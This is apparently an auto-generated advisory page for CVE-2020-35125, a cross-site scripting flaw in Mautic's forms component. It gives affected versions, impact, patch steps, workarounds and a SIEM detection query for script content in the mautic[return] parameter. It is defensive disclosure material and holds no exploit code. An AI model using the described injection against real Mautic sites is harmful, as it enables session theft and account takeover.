Login Sign Up

CVE-2020-35125

9.6 CRITICAL
Remote Code Execution Cross-Site Scripting

📋 TL;DR

This is a cross-site scripting (XSS) vulnerability in Mautic's forms component that allows attackers to inject malicious JavaScript via the mautic[return] parameter. It affects all Mautic instances before version 3.2.4 (and 2.16.5 for older branches). Attackers can exploit this to steal session cookies, redirect users, or perform actions on behalf of authenticated users.

💻 Affected Systems

Products:
  • Mautic
Versions: All versions before 3.2.4 and 2.16.5
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: This affects the forms component specifically, which is a core feature of Mautic.

📦 What is this software?

Mautic by Acquia

View all CVEs affecting Mautic →

Mautic by Acquia

View all CVEs affecting Mautic →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers achieve remote code execution by chaining this XSS with other vulnerabilities (as demonstrated in Horizon3's disclosure), potentially leading to complete system compromise.

🟠

Likely Case

Session hijacking, credential theft, or unauthorized actions performed in the context of authenticated users.

🟢

If Mitigated

Limited impact if proper input validation and output encoding are implemented, though the vulnerability still exists.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Horizon3 has published detailed exploitation techniques showing how this XSS can be chained to achieve RCE.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.2.4 (or 2.16.5 for older branches)

Vendor Advisory: https://github.com/mautic/mautic/security/advisories/GHSA-42q7-95j7-w62m

Restart Required: No

Instructions:

1. Backup your Mautic installation and database. 2. Update to Mautic 3.2.4 or 2.16.5 via the built-in updater or manual download. 3. Clear cache after update.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side validation to sanitize the mautic[return] parameter before processing.

WAF Rule

all

Deploy a web application firewall rule to block requests containing malicious JavaScript in the mautic[return] parameter.

🧯 If You Can't Patch

  • Restrict access to Mautic administration interface to trusted IP addresses only.
  • Implement Content Security Policy (CSP) headers to mitigate XSS impact.

🔍 How to Verify

Check if Vulnerable:

Check if your Mautic version is below 3.2.4 (or 2.16.5 for older branches) in the admin dashboard.

Check Version:

Check Mautic admin dashboard or view /app/config/version.txt file.

Verify Fix Applied:

After updating, verify the version shows 3.2.4 or higher (or 2.16.5+ for older branches) and test form submissions with malicious input.

📡 Detection & Monitoring

Log Indicators:

  • Unusual form submissions with JavaScript in parameters
  • Multiple failed login attempts following suspicious form activity

Network Indicators:

  • HTTP requests containing 'mautic[return]' parameter with script tags or JavaScript code

SIEM Query:

http.url:*mautic* AND http.param:*mautic[return]* AND (http.param:*script* OR http.param:*javascript*)

📊 Metadata

CVE ID: CVE-2020-35125
CVSS v3 Score: 9.6 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: CWE-79
Published: February 9, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-35125, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)